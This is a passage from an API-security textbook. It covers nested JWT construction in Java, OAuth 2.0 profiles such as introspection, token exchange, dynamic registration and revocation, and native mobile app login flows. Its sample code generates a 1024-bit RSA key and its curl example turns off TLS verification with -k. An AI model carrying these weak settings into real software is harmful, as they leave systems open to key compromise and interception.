Java code generates a nested Jwt with rsa-Oaep and aes for encryption and hMaC-sha256 for signing. the nested Jwt is constructed by encrypting the signed Jwt. you can download the complete Java sample as a Maven project from https://github.com/ apisecurity/samples/tree/master/ch08/sample03—and it runs on Java 8+. 
First you need to invoke the method buildHmacSha256SignedJWT() with a shared secret and Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 208 pass its output along with the generateKeyPair().getPublicKey() into the method buildNestedJwt(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to sign a JWT claims set using the provided shared // secret. public static SignedJWT buildHmacSha256SignedJWT(String sharedSecretString) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 ∗ 60 ∗ 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()).build(); Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 209 // create JWS header with HMAC-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.HS256); // create signer with the provider shared secret. JWSSigner signer = new MACSigner(sharedSecretString); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64-encoded text. String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return signedJWT; } // this method is used to encrypt the provided signed JWT or the JWS using // the provided public key. public static String buildNestedJWT(PublicKey publicKey, SignedJWT signedJwt) throws JOSEException { // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create a JWE object with the passed SignedJWT as the payload. JWEObject jweObject = new JWEObject(jweHeader, new Payload(signedJwt)); // encrypt the JWT. jweObject.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = jweObject.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } to build and run the program, execute the following Maven command from the ch08/ sample03 directory. \> mvn test -psample03 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 210 Summary • The JWE specification standardizes the way to represent encrypted content in a cryptographically safe manner. • JWE defines two serialized forms to represent the encrypted payload: the JWE compact serialization and JWE JSON serialization. 
• In the JWE compact serialization, a JWE token is built with five components, each separated by a period (.): JOSE header, JWE Encrypted Key, JWE Initialization Vector, JWE Ciphertext, and JWE Authentication Tag. • The JWE JSON serialization can produce encrypted data targeting at multiple recipients over the same payload. • In a Nested JWT, the payload must be a JWT itself. In other words, a JWT, which is enclosed in another JWS or JWE token, builds a Nested JWT. • A Nested JWT is used to perform nested signing and encryption. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 211 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_9 CHAPTER 9 OAuth 2.0 Profiles OAuth 2.0 is a framework for delegated authorization. It doesn’t address all specific enterprise API security use cases. The OAuth 2.0 profiles built on top of the core framework build a security ecosystem to make OAuth 2.0 ready for enterprise grade deployments. OAuth 2.0 introduced two extension points via grant types and token types. The profiles for OAuth 2.0 are built on top of this extensibility. This chapter talks about five key OAuth 2.0 profiles for token introspection, chained API invocation, dynamic client registration, and token revocation. Token Introspection OAuth 2.0 doesn’t define a standard API for communication between the resource server and the authorization server. As a result, vendor-specific, proprietary APIs have crept in to couple the resource server to the authorization server. The Token Introspection profile1 for OAuth 2.0 fills this gap by proposing a standard API to be exposed by the authorization server (Figure 9-1), allowing the resource server to talk to it and retrieve token metadata. 1 https://tools.ietf.org/html/rfc7662 212 Any party in possession of the access token can generate a token introspection request. The introspection endpoint can be secured and the popular options are mutual Transport Layer Security (mTLS) and OAuth 2.0 client credentials. POST /introspection HTTP/1.1 Accept: application/x-www-form-urlencoded Host: authz.server.com Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3 token=X3241Affw.423399JXJ& token_type_hint=access_token& Let’s examine the definition of each parameter: • token: The value of the access_token or the refresh_token. This is the token where we need to get metadata about. • token_type_hint: The type of the token (either the access_token or the refresh_token). This is optional and the value passed here could optimize the authorization server’s operations in generating the introspection response. This request returns the following JSON response. The following response does not show all possible parameters that an introspection response could include: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Figure 9-1. OAuth 2.0 Token Introspection Chapter 9 Oauth 2.0 prOfiles 213 { "active": true, "client_id":"s6BhdRkqt3", "scope": "read write dolphin", "sub": "2309fj32kl", "aud": "http://my-resource/∗" } Let’s examine the definition of the key parameters that you could expect in an introspection response: • active: Indicates whether the token is active. To be active, the token should not be expired or revoked. The authorization server can define its own criteria for how to define active. This is the only required parameter the introspection response must include. All the others are optional. 
• client_id: The identifier of the client to which the authorization server issued this token. • scope: Approved scopes associated with the token. The resource server must validate that the scopes required to access the API are at least a subset of scopes attached to the token. • sub: The subject identifier of the user who approved the authorization grant or in other words an identifier for the user who this token represents. This identifier is not necessarily a human-readable identifier, but it must carry a unique value all the time. The authorization server may produce a unique subject for each authorization server/resource server combination. This is implementation specific, and to support this, the authorization server must uniquely identify the resource server. In terms of privacy, it is essential that the authorization server maintains different subject identifiers by resource server, and this kind of an identifier is known as a persistence pseudonym. Since the authorization server issues different pseudonyms for different resource servers, for a given user, these resource servers together won’t be able to identify what other services this user accesses. Chapter 9 Oauth 2.0 prOfiles 214 • username: Carries a human-readable identifier of the user who approved the authorization grant or in other words a human- readable identifier for the user who this token represents. If you are to persist anything at the resource server end, with respect to the user, username is not the right identifier. The value of the username can change time to time, based on how it is implemented at the authorization server end. • aud: The allowed audience for the token. Ideally, this should carry an identifier that represents the corresponding resource server. If it does not match with your identifier, the resource server must immediately reject the token. This aud element can carry more than one identifier, and in that case you need to see whether your resource server’s one is part of it. Also in some implementations, rather than doing one-to- one string match, you can also match against a regular expression. For example, http://∗.my-resource.com will find a match for both the resource servers carrying the identifiers http://foo.my- resource.com and http://bar.my-resource.com. Note the audience (aud) parameter is defined in the Oauth 2.0: audience information internet draft available at http://tools.ietf.org/html/draft- tschofenig- oauth-audience-00. this is a new parameter introduced into the Oauth token request flow and is independent of the token type. • exp: Defines in seconds from January 1, 1970, in UTC, the expiration time of the token. This looks like redundant, as the active parameter is already there in the response. But resource server can utilize this parameter to optimize how frequently it wants to talk to the introspection endpoint of the authorization server. Since the call to the introspection endpoint is remote, there can be performance issues, and also it can be down due to some reason. In that case, the resource server can have a cache to carry the introspection responses, and when it gets the same token again and again, it can check the cache, and if the token has not expired, it can accept the token as valid. Also there should be a valid cache expiration time; Chapter 9 Oauth 2.0 prOfiles 215 otherwise, even if the token is revoked at the authorization server, the resource server will not know about it. • iat: Defines in seconds from January 1, 1970, in UTC, the issued time of the token. 
• nbf: Defines in seconds from January 1, 1970, in UTC, the time before the token should not be used. • token_type: Indicates the type of the token. It can be a bearer token, a MAC token (see Appendix G), or any other type. • iss: Carries an identifier that represents the issuer of the token. A resource server can accept tokens from multiple issuers (or authorization servers). If you store the subject of the token at the resource server end, it becomes unique only with the issuer. So you need to store it along with the issuer. There can be a case where the resource server connects to a multitenanted authorization server. In that case, your introspection endpoint will be the same, but it will be different issuers who issue tokens under different tenants. • jti: This is a unique identifier for the token, issued by the authorization server. The jti is mostly used when the access token the authorization server issues is a JWT or a self-contained access token. This is useful to avoid replaying access tokens. While validating the response from the introspection endpoint, the resource server should first check whether the value of active is set to true. Then it should check whether the value of aud in the response matches the aud URI associated with the resource server or the resource. Finally, it can validate the scope. The required scope to access the resource should be a subset of the scope values returned in the introspection response. If the resource server wants to do further access control based on the client or the resource owner, it can do so with respect to the values of sub and client_id. Chain Grant Type Once the audience restriction is enforced on OAuth tokens, they can only be used against the intended audience. You can access an API with an access token that has an audience restriction corresponding to that API. If this API wants to talk to another Chapter 9 Oauth 2.0 prOfiles 216 protected API to form the response to the client, the first API must authenticate to the second API. When it does so, the first API can’t just pass the access token it received initially from the client. That will fail the audience restriction validation at the second API. The Chain Grant Type OAuth 2.0 profile defines a standard way to address this concern. According to the OAuth Chain Grant Type profile, the API hosted in the first resource server must talk to the authorization server and exchange the OAuth access token it received from the client for a new one that can be used to talk to the other API hosted in the second resource server. Note the Chain Grant type for Oauth 2.0 profile is available at https:// datatracker.ietf.org/doc/draft-hunt-oauth-chain. The chain grant type request must be generated from the first resource server to the authorization server. The value of the grant type must be set to http://oauth. net/grant_type/chain and should include the OAuth access token received from the client. The scope parameter should express the required scopes for the second resource in space-delimited strings. Ideally, the scope should be the same as or a subset of the scopes associated with the original access token. If there is any difference, then the authorization server can decide whether to issue an access token or not. 
This decision can be based on an out-of-band agreement with the resource owner: POST /token HTTP/1.1 Host: authz.server.net Content-Type: application/x-www-form-urlencoded grant_type=http://oauth.net/grant_type/chain oauth_token=dsddDLJkuiiuieqjhk238khjh scope=read This returns the following JSON response. The response includes an access token with a limited lifetime, but it should not have a refresh token. To get a new access token, the first resource server once again must present the original access token: HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Cache-Control: no-store Chapter 9 Oauth 2.0 prOfiles 217 Pragma: no-cache { "access_token":"2YotnFZFEjr1zCsicMWpAA", "token_type":"Bearer", "expires_in":1800, } The first resource server can use the access token from this response to talk to the second resource server. Then the second resource server talks to the authorization server to validate the access token (see Figure 9-2). Figure 9-2. OAuth 2.0 Token Exchange We talked about the chain grant type in the first edition of the book as well. But since then this specification didn’t make any progress. If you are using the chain grant type already, you should migrate to the OAuth 2.0 Token Exchange specification, which is still at the draft stage, but closer to being an RFC. In the next section, we talk about OAuth 2.0 Token Exchange draft RFC. Token Exchange The OAuth 2.0 Token Exchange is a draft proposal discussed under the IETF working group at the moment. It solves a similar problem, which was addressed by the Chain Grant Type proposal we discussed in the previous section, with some improvements. Like in the chain grant type, when the first resource server receives an access token Chapter 9 Oauth 2.0 prOfiles 218 from the client application, and when it wants to talk to another resource server, the first resource server generates the following request to talk to the authorization server—and exchanges the access token it got from the client application to a new one. POST /token HTTP/1.1 Host: authz.server.net Content-Type: application/x-www-form-urlencoded grant_type=urn:ietf:params:oauth:grant-type:token-exchange subject_token=dsddDLJkuiiuieqjhk238khjh subject_token_type=urn:ietf:params:oauth:token-type:access_token requested_token_type=urn:ietf:params:oauth:token-type:access_token resource=https://bar.example.com scope=read The preceding sample request does not include all possible parameters. Let’s have a look at the key parameters that you could expect in a token exchange request: • grant_type: Indicates to the token endpoint that, this is a request related to token exchange and must carry the value urn:ietf:params:oauth:grant-type:token-exchange. This is a required parameter. • resource: The value of this parameter carries a reference to the target resource. For example, if the initial request comes to foo API, and it wants to talk to the bar API, then the value of the resource parameter carries the endpoint of the bar API. This is also quite useful in a microservices deployment, where one microservice has to authenticate to another microservice. The OAuth 2.0 authorization server can enforce access control policies against this request to check whether the foo API can access the bar API. This is an optional parameter. • audience: The value of this parameter serves the same purpose as the resource parameter, but in this case the value of the audience parameter is a reference of the target resource, not an absolute URL. 
If you intend to use the same token against multiple target resources, you can include a list of audience values under the audience parameter. This is an optional parameter. Chapter 9 Oauth 2.0 prOfiles 219 • scope: Indicates the scope values with respect to the new token. This parameter can carry a list of space-delimited, case-sensitive strings. This is an optional parameter. • requested_token_type: Indicates the type of request token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf: params:oauth:token-type:id_token, urn:ietf:params:oauth: token-type:saml1, and urn:ietf:params:oauth:token-type: saml2. This is an optional parameter, and if it is missing, the token endpoint can decide the type of the token to return. If you use a different token type, which is not in the above list, then you can have your own URI as the requested_token_type. • subject_token: Carries the initial token the first API receives. This carries the identity of the entity that initially invokes the first API. This is a required parameter. • subject_token_type: Indicates the type of subject_token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf:params:oauth:token-type:id_ token, urn:ietf:params:oauth:token-type:saml1, and urn:ietf:params:oauth:token-type:saml2. This is a required parameter. If you use a different token type, which is not in the above list, then you can have your own URI as the subject_token_type. • actor_token: Carries a security token, which represents the identity of the entity that intends to use the requested token. In our case, when foo API wants to talk to the bar API, actor_token represents the foo API. This is an optional parameter. • actor_token_type: Indicates the type of actor_token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf:params:oauth:token-type:id_ token, urn:ietf:params:oauth:token-type:saml1, and urn:ietf:params:oauth:token-type:saml2. This is a required Chapter 9 Oauth 2.0 prOfiles 220 parameter when the actor_token is present in the request. If you use a different token type, which is not in the above list, then you can have your own URI as the actor_token_type. The preceding request returns the following JSON response. The access_token parameter in the response carries the requested token, while the issued_token_type indicates its type. The other parameters in the response, token_type, expires_in, scope, and refresh_token, carry the same meaning as in a typical OAuth 2.0 token response, which we discussed in Chapter 4. HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-cache, no-store { "access_token":"eyJhbGciOiJFUzI1NiIsImtpZCI6IjllciJ9 ", "issued_token_type": "urn:ietf:params:oauth:token-type:access_token", "token_type":"Bearer", "expires_in":60 } Dynamic Client Registration Profile According to the OAuth 2.0 core specification, all OAuth clients must be registered with the OAuth authorization server and obtain a client identifier before any interactions. The aim of the Dynamic Client Registration OAuth 2.0 profile2 is to expose an endpoint for client registration in a standard manner to facilitate on-the-fly registrations. The dynamic registration endpoint exposed by the authorization server can be secured or not. 
If it’s secured, it can be secured with OAuth, HTTP Basic authentication, Mutual Transport Layer Security (mTLS), or any other security protocol as desired by the authorization server. The Dynamic Client Registration profile doesn’t enforce any authentication protocols over the registration endpoint, but it must be secured with TLS. If the authorization server decides that it should allow the endpoint to be public and let anyone be registered, it can do so. For the registration, the client application must pass all its metadata to the registration endpoint: 2 https://tools.ietf.org/html/rfc7591 Chapter 9 Oauth 2.0 prOfiles 221 POST /register HTTP/1.1 Content-Type: application/json Accept: application/json Host: authz.server.com { "redirect_uris":["https://client.org/callback","https://client.org/ callback2"], "token_endpoint_auth_method":"client_secret_basic", "grant_types": ["authorization_code" , "implicit"], "response_types": ["code" , "token"], } Let’s examine the definition of some of the important parameters in the client registration request: • redirect_uris: An array of URIs under the control of the client. The user is redirected to one of these redirect_uris after the authorization grant. These redirect URIs must be over Transport Layer Security (TLS). • token_endpoint_auth_method: The supported authentication scheme when talking to the token endpoint. If the value is client_ secret_basic, the client sends its client ID and the client secret in the HTTP Basic Authorization header. If it’s client_secret_post, the client ID and the client secret are in the HTTP POST body. If the value is none, the client doesn’t want to authenticate, which means it’s a public client (as in the case of the OAuth implicit grant type or when you use authorization code grant type with a single- page application). Even though this RFC only supports three client authentication methods, the other OAuth profiles can introduce their own. For example, OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens, a draft RFC which is being discussed under the IETF OAuth working group at the moment, introduces a new authentication method called tls_client_auth. This indicates that client authentication to the token endpoint happens with mutual TLS. Chapter 9 Oauth 2.0 prOfiles 222 • grant_types: An array of grant types supported by the client. It is always better to limit your client application only to use the grant types it needs and no more. For example, if your client application is a single-page application, then you must only use authorization_ code grant type. • response_types: An array of expected response types from the authorization server. In most of the cases, there is a correlation between the grant_types and response_types—and if you pick something inconsistent, the authorization server will reject the registration request. • client_name: A human-readable name that represents the client application. The authorization server will display the client name to the end users during the login flow. This must be informative enough so that the end users will be able to figure out the client application, during the login flow. • client_uri: A URL that points to the client application. The authorization server will display this URL to the end users, during the login flow in a clickable manner. • logo_uri: A URL pointing to the logo of the client application. The authorization server will display the logo to the end users, during the login flow. 
• scope: A string containing a space-separated list of scope values where the client intends to request from the authorization server. • contacts: A list of representatives from the client application end. • tos_uri: A URL pointing to the terms of service document of the client application. The authorization server will display this link to the end users, during the login flow. • policy_uri: A URL pointing to the privacy policy document of the client application. The authorization server will display this link to the end users, during the login flow. Chapter 9 Oauth 2.0 prOfiles 223 • jwks_uri: Points to the endpoint, which carries the JSON Web Key (JWK) Set document with the client’s public key. Authorization server uses this public key to validate the signature of any of the requests signed by the client application. If the client application cannot host its public key via an endpoint, it can share the JWKS document under the parameter jwks instead of jwks_uri. Both the parameters must not be present in a single request. • software_id: This is similar to client_id, but there is a major difference. The client_id is generated by the authorization server and mostly used to identify the application. But the client_id can change during the lifetime of an application. In contrast, the software_id is unique to the application across its lifecycle and uniquely represents all the metadata associated with it throughout the application lifecycle. • software_version: The version of the client application, identified by the software_id. • software_statement: This is a special parameter in the registration request, which carries a JSON Web Token (JWT). This JWT includes all the metadata defined earlier with respect to the client. In case the same parameter is defined in JWT and also in the request outside the software_statement parameter, then the parameter within the software_statement will take the precedence. Based on the policies of the authorization server, it can decide whether it should proceed with the registration or not. Even if it decides to go ahead with the registration, the authorization server need not accept all the suggested parameters from the client. For example, the client may suggest using both authorization_code and implicit as grant types, but the authorization server can decide what to allow. The same is true for the token_endpoint_auth_method: the authorization server can decide what to support. The following is a sample response from the authorization server: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Pragma: no-cache Chapter 9 Oauth 2.0 prOfiles 224 { "client_id":"iuyiSgfgfhffgfh", "client_secret":"hkjhkiiu89hknhkjhuyjhk", "client_id_issued_at":2343276600, "client_secret_expires_at":2503286900, "redirect_uris":["https://client.org/callback","https://client.org/callback2"], "grant_types":"authorization_code", "token_endpoint_auth_method":"client_secret_basic", } Let’s examine the definition of each parameter: • client_id: The generated unique identifier for the client. • client_secret: The generated client secret corresponding to the client_id. This is optional. For example, for public clients the client_secret isn’t required. • client_id_issued_at: The number of seconds since January 1, 1970. • client_secret_expires_at: The number of seconds since January 1, 1970 or 0 if it does not expire. • redirect_uris: Accepted redirect_uris. • token_endpoint_auth_method: The accepted authentication method for the token endpoint. 
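Putting the request and the response together, you can try a registration against the authorization server's registration endpoint with a simple curl command, as shown below. This is only a sketch: the endpoint, redirect URI, and client name are placeholder values, and a real authorization server may require you to authenticate to this endpoint as discussed earlier.

\> curl -k -X POST \
     -H "Content-Type: application/json" \
     -H "Accept: application/json" \
     -d '{
           "redirect_uris": ["https://client.org/callback"],
           "token_endpoint_auth_method": "client_secret_basic",
           "grant_types": ["authorization_code"],
           "response_types": ["code"],
           "client_name": "Foo Native App"
         }' \
     https://authz.server.com/register

If the registration is accepted, the response carries the generated client_id, a client_secret (for confidential clients), and the metadata the authorization server agreed to, as in the sample response above.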
Note the Dynamic Client registration Oauth 2.0 profile is quite useful in mobile applications. Mobile client applications secured with Oauth have the client iD and the client secret baked into the application. these are the same for all the installations of a given application. if a given client secret is compromised, that will affect all the installations, and rogue client applications can be developed using the stolen keys. these rogue client applications can generate more traffic on the server and exceed the legitimate throttling limit, hence causing a denial of service attack. With dynamic client registration, you need not set the same client iD and client secret for all the installations of a give application. During the installation process, the application can talk to the authorization server’s registration endpoint and generate a client iD and a client secret per installation. Chapter 9 Oauth 2.0 prOfiles 225 Token Revocation Profile Two parties can perform OAuth token revocation. The resource owner should be able to revoke an access token issued to a client, and the client should be able to revoke an access token or a refresh token it has acquired. The Token Revocation OAuth 2.0 profile3 addresses the latter. It introduces a standard token-revoke endpoint at the authorization server end. To revoke an access token or a refresh token, the client must notify the revoke endpoint. Note in October 2013, there was an attack against Buffer (a social media management service that can be used to cross-post between facebook, twitter, etc.). Buffer was using Oauth to access user profiles in facebook and twitter. Once Buffer detected that it was under attack, it revoked all its access keys from facebook, twitter, and other social media sites, which prevented attackers from getting access to users’ facebook and twitter accounts. The client must initiate the token revocation request. The client can authenticate to the authorization server via HTTP Basic authentication (with its client ID and client secret), with mutual TLS or with any other authentication mechanism proposed by the authorization server and then talk to the revoke endpoint. The request should consist of either the access token or the refresh token and then a token_type_hint that informs the authorization server about the type of the token (access_token or refresh_token). This parameter may not be required, but the authorization server can optimize its search criteria using it. Here is a sample request: POST /revoke HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded Authorization: Basic czZCaGRSdadsdI9iuiaHk99kjkh token=dsd0lkjkkljkkllkdsdds&token_type_hint=access_token 3 https://tools.ietf.org/html/rfc7009 Chapter 9 Oauth 2.0 prOfiles 226 In response to this request, the authorization server first must validate the client credentials and then proceed with the token revocation. If the token is a refresh token, the authorization server must invalidate all the access tokens issued for the authorization grant associated with that refresh token. If it’s an access token, it’s up to the authorization server to decide whether to revoke the refresh token or not. In most cases, it’s ideal to revoke the refresh token, too. Once the token revocation is completed successfully, the authorization server must send an HTTP 200 status code back to the client. Summary • The OAuth 2.0 profiles built on top of the core framework build a security ecosystem to make OAuth 2.0 ready for enterprise grade deployments. 
• OAuth 2.0 introduced two extension points via grant types and token types. • The Token Introspection profile for OAuth 2.0 introduces a standard API at the authorization server, allowing the resource server to talk to it and retrieve token metadata. • According to the OAuth Chain Grant Type profile, the API hosted in the first resource server must talk to the authorization server and exchange the OAuth access token it received from the client for a new one that can be used to talk to another API hosted in a second resource server. • The OAuth 2.0 Token Exchange is a draft proposal discussed under the IETF working group at the moment, which solves a similar problem as the Chain Grant Type proposal with some improvements. • The aim of the Dynamic Client Registration OAuth 2.0 profile is to expose an endpoint for client registration in a standard manner to facilitate on-the-fly registrations. • The Token Revocation OAuth 2.0 profile introduces a standard token- revoke endpoint at the authorization server to revoke an access token or a refresh token by the client. Chapter 9 Oauth 2.0 prOfiles 227 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_10 CHAPTER 10 Accessing APIs via Native Mobile Apps The adoption of native mobile apps has increased heavily in the last few years. Within the first decade of the 21st century, the Internet users worldwide increased from 350 million to more than 2 billion and mobile phone subscribers from 750 million to 5 billion—and today it hits 6 billion, where the world population is around 7 billion. Most of the mobile devices out there–even the cheapest ones—could be used to access the Internet. We treat a native mobile application as an untrusted or a public client. A client application, which is not capable of protecting its own keys or credentials, is identified as a public client under OAuth terminology. Since the native mobile apps run on a device owned by the user, the user who is having complete access to the mobile device can figure out any keys the application hides. This is a hard challenge we face in accessing secured APIs from a native mobile application. In this chapter, we discuss the best practices in using OAuth 2.0 for native apps, Proof Key for Code Exchange (PKCE), which is an approach for protecting native apps from code interception attack and protecting native apps in a browser-less environment. Mobile Single Sign-On (SSO) It takes an average of 20 seconds for a user to log in to an application. Not having to enter a password each time a user needs to access a resource saves time and makes users more productive and also reduces the frustration of multiple login events and forgotten passwords. When we have single sign-on, the users will only have one password to remember and update and only one set of password rules to remember. Their initial login provides them with access to all the resources, typically for the entire day or the week. 228 If you provide multiple mobile applications for your corporate employees to access from their mobile devices, it’s a pain to ask them to re-login to each application independently. Possibly all of them may be sharing the same credential store. This is analogous to a case where Facebook users log in to multiple third-party mobile applications with their Facebook credentials. With Facebook login, you only login once to Facebook and will automatically log into the other applications rely on Facebook login. 
In mobile world, login to native apps is done in three different ways: directly asking for user credentials, using a WebView, and using the system browser. Login with Direct Credentials With this approach, the user directly provides the credentials to the native app itself (see Figure 10-1). And the app will use an API (or OAuth 2.0 password grant type) to authenticate the user. This approach assumes the native app is trusted. In case your native app uses a third-party identity provider for login, we must not use this. Even this approach may not be possible, unless the third-party identity provider provides a login API or supports OAuth 2.0 password grant type. Also this approach can make the users vulnerable for phishing attacks. An attacker can plant a phishing attack by fooling the user to install a native app with the same look and feel as the original app and then mislead the user to share his or her credentials with it. In addition to this risk, login with direct credentials does not help in building a single sign-on experience, when you have multiple native apps. You need to use your credentials to log in to each individual application. Chapter 10 aCCessing apis via native Mobile apps 229 Login with WebView The native app developers use a WebView in a native app to embed the browser, so that the app can use web technologies such as HTML, JavaScript, and CSS. During the login flow, the native app loads the system browser into a WebView and uses HTTP redirects to get the user to the corresponding identity provider. For example, if you want to authenticate users with Facebook, to your native app, you load the system browser into a WebView first and then redirect the user to Facebook. What’s happening in the browser loaded into the WebView is no different from the flow you see when you log in to a web app via Facebook using a browser. The WebView-based approach was popular in building hybrid native apps, because it provides better user experience. The users won’t notice the browser being loaded into the WebView. It looks like everything happens in the same native app. Figure 10-1. The Chase bank’s mobile app, which users directly provide credentials for login Chapter 10 aCCessing apis via native Mobile apps 230 It also has some major disadvantages. The web session under the browser loaded into a WebView of a native app is not shared between multiple native apps. For example, if you do login with Facebook to one native app, by redirecting the user to facebook.com via a browser loaded into a WebView, the user has to log in to Facebook again and again, when multiple native apps follow the same approach. That is because the web session created under facebook.com in one WebView is not shared with another WebView of a different native app. So the single sign-on (SSO) between native apps will not work with the WebView approach. WebView-based native apps also make the users more vulnerable to phishing attacks. In the same example we discussed before, when a user gets redirected to facebook.com via the system browser loaded into a WebView, he or she won’t be able to figure out whether they are visiting something outside the native app. So, the native app developer can trick the user by presenting something very similar to facebook.com and steal user’s Facebook credentials. Due to this reason, most of the developers are now moving away from using a WebView for login. 
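As a point of reference for the direct-credentials approach discussed above, the token request the native app sends typically follows the OAuth 2.0 password grant and looks roughly like the following. The token endpoint, client_id, and user credentials here are placeholder values, and since the native app is a public client, no client secret is sent.

POST /token HTTP/1.1
Host: idp.foo.com
Content-Type: application/x-www-form-urlencoded

grant_type=password&client_id=FFGFGOIPI7898778&username=john&password=john-password&scope=openid

Because the app itself sees the raw user credentials in this flow, it only makes sense for first-party, trusted apps; the browser-based approaches avoid exposing the credentials to the app.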
Login with a System Browser This approach for login into a native app is similar to what we discussed in the previous section, but instead of the WebView, the native app spins up the system browser (see Figure 10-2). System browser itself is another native app. User experience in this approach is not as smooth as with the WebView approach, as the user has to switch between two native apps during the login process, but in terms of security, this is the best approach. Also, this is the only approach we can have single sign-on experience in a mobile environment. Unlike WebView approach, when you use the system browser, it manages a single web session for the user. Say, for example, when there are multiple native apps using Facebook login via the same system browser, the users only need to log in to Facebook once. Once a web session is created under facebook.com domain with the system browser, for the subsequent login requests from other native apps, users will be logged in automatically. In the next section, we see how we can use OAuth 2.0 securely to build this use case. Chapter 10 aCCessing apis via native Mobile apps 231 Using OAuth 2.0 in Native Mobile Apps OAuth 2.0 has become the de facto standard for mobile application authentication. In our security design, we need to treat a native app a dumb application. It is very much similar to a single-page application. The following lists out the sequence of events that happen in using OAuth 2.0 to log in to a native mobile app. Figure 10-2. Login to Foursquare native app using Facebook Chapter 10 aCCessing apis via native Mobile apps 232 1. Mobile app developer has to register the application with the corresponding identity provider or the OAuth 2.0 authorization server and obtain a client_id. The recommendation is to use OAuth 2.0 authorization code grant type, without a client secret. Since the native app is an untrusted client, there is no point of having a client secret. Some were using implicit grant type for native apps, but it has its own inherent security issues and not recommended any more. 2. Instead of WebView, use SFSafariViewController with iOS9+ or Chrome Custom Tabs for Android. This web controller provides all the benefits of the native system browser in a control that can be placed within an application. Then you can embed the client_id obtained from step 1 into the application. When you embed a client_id into an app, it will be the same for all the instances of that native app. If you want to differentiate each instance of the app (installed in different devices), then we can dynamically generate a client_id for each instance at the start of the app, following the protocol defined in OAuth 2.0 Dynamic Client Registration profile, which we explained in detail in Chapter 9. Figure 10-3. A typical login flow for a native mobile app with OAuth 2.0 Chapter 10 aCCessing apis via native Mobile apps 233 3. During the installation of the app, we need to register an app- specific custom URL scheme with the mobile operating system. This URL scheme must match the callback URL or redirect URI you used in step 1, at the time of app registration. A custom URL scheme lets the mobile operating system to pass back the control to your app from another external application, for example from the system browser. If you send some parameters to the app-specific custom URI scheme on the browser, the mobile operating system will track that and invoke the corresponding native app with those parameters. 4. 
Once the user clicks login, on the native app, we need to spin up the system browser and follow the protocol defined in OAuth 2.0 authorization code grant type (see Figure 10-3), which we discussed in detail in Chapter 4. 5. After the user authenticates to the identity provider, the browser redirects the user back to the registered redirect URI, which is in fact a custom URL scheme registered with the mobile operating system. 6. Upon receiving the authorization code to the custom URL scheme on the system browser, the mobile operating system spins up the corresponding native app and passes over the control. 7. The native app will talk to the token endpoint of the authorization server and exchange the authorization code to an access token. 8. The native app uses the access token to access APIs. Inter-app Communication The system browser itself is another native app. We used a custom URL scheme as a way of inter-app communication to receive the authorization code from the authorization server. There are multiple ways for inter-app communication available in a mobile environment: private-use URI scheme (also known as custom URL scheme), claimed HTTPS URL scheme, and loopback URI scheme. Chapter 10 aCCessing apis via native Mobile apps 234 Private URI Schemes In the previous section, we already discussed how a private URI scheme works. When the browser hits with a private URI scheme, it invokes the corresponding native app, registered for that URI scheme, and hands over the control. The RFC 75951 defines guidelines and registration procedures for URI schemes, and according to that, it is recommended to use a domain name that is under your control, in its reverse order as the private URI scheme. For example, if you own app.foo.com, then the private URI scheme should be com.foo.app. The complete private URI scheme may look like com.foo.app:/oauth2/redirect, and there is only one slash that appears right after the scheme component. In the same mobile environment, the private URI schemes can collide with each other. For example, there can be two apps registered for the same URI scheme. Ideally, this should not happen if you follow the convention we discussed before while choosing an identifier. But still there is an opportunity that an attacker can use this technique to carry out a code interception attack. To prevent such attacks, we must use Proof Key for Code Exchange (PKCE) along with private URI schemes. We discuss PKCE in a later section. Claimed HTTPS URI Scheme Just like the private URI scheme, which we discussed in the previous section, when a browser sees a claimed HTTPS URI scheme, instead of loading the corresponding page, it hands over the control to the corresponding native app. In supported mobile operating systems, you can claim an HTTPS domain, which you have control. The complete claimed HTTPS URI scheme may look like https://app.foo.com/oauth2/redirect. 